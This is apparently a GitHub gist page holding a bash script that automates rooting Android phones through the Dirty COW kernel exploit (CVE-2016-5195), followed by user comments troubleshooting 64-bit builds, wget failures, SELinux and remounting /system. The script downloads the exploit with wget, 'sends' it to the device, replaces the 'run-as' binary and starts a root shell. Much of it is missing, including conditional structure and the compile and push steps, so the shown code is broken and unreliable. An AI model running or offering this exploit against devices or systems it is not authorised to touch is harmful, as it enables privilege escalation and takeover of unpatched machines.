# Give the usual warning.
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
rm -f $workspacezip > /dev/null; # Remove zip if it exists
rm -rf $workspace > /dev/null; # Remove workspace if it exists
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1;
if [ -f $workspacezip ];
echo "[INFO] Extracting exploit files...";
unzip -a $workspacezip -d $workspace > /dev/null;
rm -f $workspacezip; # Remove zip if it exists
echo "[ERR] Failed to download exploit files.";
if [ -d $workspace ];
directory=$PWD; # thx @tomdeboer!
echo "[ERR] Failed to extract exploit files.";
# Compile and send exploit.
echo "[INFO] Exploiting dirtyc0w vulnerability...";
sleep 1; # Let them read the message before chaos
echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";
rm -rf $directory; # Clean up workspace
echo "[INFO] Starting shell in 3 seconds...";
sleep 3; # Look, it worked!
It does not work on my Stock Samsung Galaxy S5 (Android 6.0.1/Patchlevel September 1-2016/Kernel3.4.0-8538464).
@blizzard4591 Hey. You're not the only one with that problem actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but in the makefile, you can change a setting in the makefile so it compiles for 64-bit architecture.
Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7
@MF064DD Is there an error when you run:
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip;
Edit: Oh, never mind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience!
@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed.
@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too).
I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though:
Root Android 32-bit / Guide
And tada! The
@blizzard4591 Here's a quote from the issue:
The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.
[This is how I modified the file]
A good way to get device's abi could be
Heh, here we go.
@RaPoZaUm Probably would work, but I haven't tested it.
Does anyone have any idea what to use for the argument of run-as?
edit: I found what goes on package-name, this will give you a list of options
but... it doesn't work, example:
It won't work anyway. The exploit in question can't run anything out of its normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run
If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :)
@MF064DD Sorry for the late response. Type
Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.
I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do
If I try to run any package with
Any thoughts @Arinerron ?
Once I gain root access I can't remount system for installing su binary,
athene_f:/ $ run-as
uid run-as 2000
athene_f:/ # whoami
athene_f:/ # mount -o rw,remount /system
make root && adb shell;
and my phone is a 32bits
hi, I've done all the steps, but don't get any info instead of exploited.